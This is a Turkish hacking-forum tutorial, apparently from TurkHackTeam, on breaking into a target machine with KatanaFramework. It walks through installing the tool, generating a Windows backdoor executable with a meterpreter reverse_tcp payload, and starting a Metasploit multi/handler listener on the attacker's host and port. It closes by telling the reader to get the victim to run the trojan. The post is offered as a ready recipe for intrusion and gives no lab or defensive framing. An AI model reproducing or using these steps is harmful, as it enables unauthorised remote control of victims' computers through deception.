Hedef Makineye Sızma! (KatanaFramework)

Bugs Bunny

Uzman üye
29 Tem 2016
1,487
35
MSFVenom
Herkese merhaba TurkHackTeam üyeleri,

Ben Uchiha-Sasuke

Bu konumda sizlere KatanaFramework toolu ile hedefe sızmayı göstereceğim.


giphy.gif



Hedef Makineye Sızma! (KatanaFramework)

İlk olarak terminalimizi çalıştıralım.

Sv5feQ.png


Root izniniz yoksa su komutuyla root izni almayı unutmayın.

Ardından toolumuzu indirelim.

Sv57ac.png


Komutumuz;

Kod:
git clone https://github.com/PowerScript/KatanaFramework

Toolumuz indi, artık dosyamızın içine girip gerekli işlemleri gerçekleştirebiliriz.

Sv5dfe.png


Komutumuz;

Kod:
cd KatanaFramework
chmod +x install

Dosyamızın içine girip install'ı yetkilendirdik.

Artık yetkilendirmiş olduğumuz install'ı çalıştırabiliriz.

SvIkuN.png


Komutumuz;

Kod:
./install

SvIopP.png


Gerekli şeyleri otomatik bir şekilde kurdu.

Artık toolumuzu çalıştıralım.

SvIVJY.png


Komutumuz;

Kod:
ktf.console

Toolumuz başarılı bir şekilde çalıştı.

SvInX0.png


help yazıp yardım alabilirsiniz.

En üsttede görüldüğü gibi show modules yazıp modülleri görebilmekteyiz.

SvIJev.png


Burada birsürü modül bulunmakta, ancak biz hedef makineye sızacağımızdan backdoor oluşturacağız.

SvIya6.png


Komutumuz;

Kod:
use msf/back.door

SvISwy.png


Komutumuz;

Kod:
sop(show options)

Doldurmamız gereken bilgiler bizi karşılıyor.

Gerekli olan yerleri kendinize göre dolduracaksınız.

Ben windows makineye sızacağımdan dolayı bazı yerleri değiştirmeme gerek yok.

SvI5ph.png


Komutumuz;

Kod:
set host 192.168.1.x (LHOST'unuz buraya yazacaksınız.)
set port xxxx (LPORT'unuzu  buraya yazacaksınız.)
set output /root/Masaüstü/backdoor.exe (Backdoor'umuzun oluşmasını istediğiniz yeri yazacaksınız.)
set payload windows/meterpreter/reverse_tcp (Payload'ı buraya yazacaksınız.

Eğer IP Adresini bilmiyorsanız;

SvIacj.png


Komutumuz;

Kod:
ifconfig

Gerekli yerleri doldurduk artık run yazıp backdoor'umuzu oluşturabiliriz.

SvIOHH.png


SvINkU.png


Backdoor'umuz başarılı bir şekilde oluştu.

Artık backdoor'umuzu dinlemeye alabiliriz.

SvIj1A.png


Komutumuz;

Kod:
msfconsole

Met@sploit ile dinlemeye alacağız.

SvIXw1.png


Komutumuz;

Kod:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.x (HOST'unuzu yazacaksınız.)
set lport (Açtığınız portu yazacaksınız.)
run

Ve dinleme işlemi başladı.

Artık trojanımızı karşıya yedirmek kaldı.

SvID3s.png


Karşı taraf trojanı çalıştırdığı anda sızmış bulunmaktayız.



Bu konumunda burda sonuna gelmiş bulunmaktayım.

Uchiha iyi günler diler.

oKEKz1.gif
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.